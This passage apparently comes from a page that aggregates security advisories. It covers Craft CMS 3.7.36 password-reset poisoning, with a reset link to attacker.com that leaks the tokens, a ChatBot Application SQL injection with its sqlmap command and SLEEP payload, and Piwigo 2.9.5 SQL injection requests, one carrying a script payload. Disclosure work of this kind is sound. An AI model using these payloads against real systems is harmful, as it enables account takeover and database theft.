http://www.attacker.com/index.php?p=admin/set-password&code=D6HWm7pGpYEt9mb-mPVh4kGzXWZ8ax5u&id=48b9fe48-91c9-430e-baa2-5bdf66c88102

If you were not expecting this email, just ignore it.  
-------------------------------------------------------------------------------

If the user is not aware and clicks on the link, the values of the reset tokens  
"code" and "id" will be sent to the attacker's web server. The attacker is  
then able to relay the tokens to the original reset endpoint and reset the  
password.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* 3.7.36

Vendor contact timeline:  
------------------------  
2022-03-10: Contacting vendor through contact form.  
2022-03-14: Vendor provides Craft CMS installation for verifying the vulnerability.  
2022-03-22: SEC Consult provides the vulnerability advisory through contact form.  
2022-03-23: Vendor responded that there is a hardening measure available.  
2022-03-31: SEC Consult replied that all installations of the current version  
             (including the testing instance provided by the vendor) are vulnerable  
             by default and the vulnerability is implementation-based and results  
             from bad coding practices.  
Until 2022-05-02: No answer from vendor.  
2022-05-03: Set advisory release date to 5th May. Informing vendor about  
             scheduled advisory release.  
2022-05-05: Release of security advisory.

Solution:  
---------  
The vendor knows about the vulnerability and the resulting risks. A possible  
hardening measure has to be implemented manually and is documented here:  
https://craftcms.com/knowledge-base/securing-craft#explicitly-set-the-web-alias-for-the-site  
https://craftcms.com/docs/3.x/sites.html#site-url

The vendor responded that the vulnerability will not be fixed as a workaround  
is available.

Workaround:  
-----------  
The backend login interface and the password reset function should not be  
accessible from the internet or from any unknown IP addresses. The user  
must implement the workaround described in the hardening guide above in order  
to mitigate this issue.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Einfeldt / @2022

Craft CMS 3.7.36 Password Reset Poisoning Attack

ChatBot Application with a Suggestion Feature version 1.0 suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection# Date: 05/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 4 in file "/simple_chat_bot/admin/responses/view_response.php"$qry = $conn->query("SELECT * from `response_list` where id = '{$_GET['id']}' ");# Sqlmap command:sqlmap -u 'http://localhost/simple_chat_bot/admin/?id=0&page=responses/view_response' -p id --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=0' AND (SELECT 9931 FROM (SELECT(SLEEP(5)))Etug)-- bfDF&page=responses/view_response

ChatBot Application With A Suggestion Feature 1.0 SQL Injection

SQL Injection vulnerability in admin/group_list.php in piwigo v2.9.5, via the group parameter to delete.

POST /admin.php?page=group\_list HTTP/1.1  
Host: 10.150.10.186:30001  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://10.150.10.186:30001/admin.php?page=group\_list  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 430  
Cookie: pwg\_display\_thumbnail=no\_display\_thumbnail; pwg\_id=hb609s43hqj1iqrkvlrvgne5q7  
Connection: close  
Upgrade-Insecure-Requests: 1

pwg\_token=036e74fc33b5eee65c74f44b98c09e13&group\_selection%5B%5D=1&selectAction=delete&rename\_1=1%3E%3Cscript%3Ealert%28%2Fgroup%2F%29%3C%2Fscript%3E&merge=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&confirm\_deletion=1&duplicate\_1=%E5%9C%A8%E9%80%99%E8%BC%B8%E5%85%A5%E6%96%B0%E7%9A%84%E7%BE%A4%E7%B5%84%E5%88%A5%E5%90%8D%E7%A8%B1&submit=%E6%87%89%E7%94%A8%E5%8B%95%E4%BD%9C

CVE-2020-19212: SQL injection in group_list.php · Issue #1009 · Piwigo/Piwigo

SQL Injection vulnerability in cat_move.php in piwigo v2.9.5, via the selection parameter to move_categories.

    POST /admin.php?page=cat_move HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=cat_move
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 108
    Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    selection%5B%5D=4&parent=7&submit=%E6%8F%90%E4%BA%A4

CVE-2020-19213: SQL injection in cat_move.php · Issue #1010 · Piwigo/Piwigo

SQL Injection vulnerability in admin/user_perm.php in piwigo v2.9.5, via the cat_false parameter to admin.php?page=user_perm.

    POST /admin.php?page=group_perm&group_id=1 HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=group_perm&group_id=1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 33
    Cookie: pwg_id=tnnrng7j58gsgjms5hcdu2ge35
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    cat_false%5B%5D=11&trueify=%C2%AB
    

    POST /admin.php?page=user_perm&user_id=1 HTTP/1.1
    Host: 10.150.10.186:30008
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://10.150.10.186:30008/admin.php?page=user_perm&user_id=1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 86
    Cookie: pwg_id=bv8q0gb8mbcqb99bhcqdlf1q20
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    cat_false%5B%5D=1&trueify=%C2%AB

Tag

#php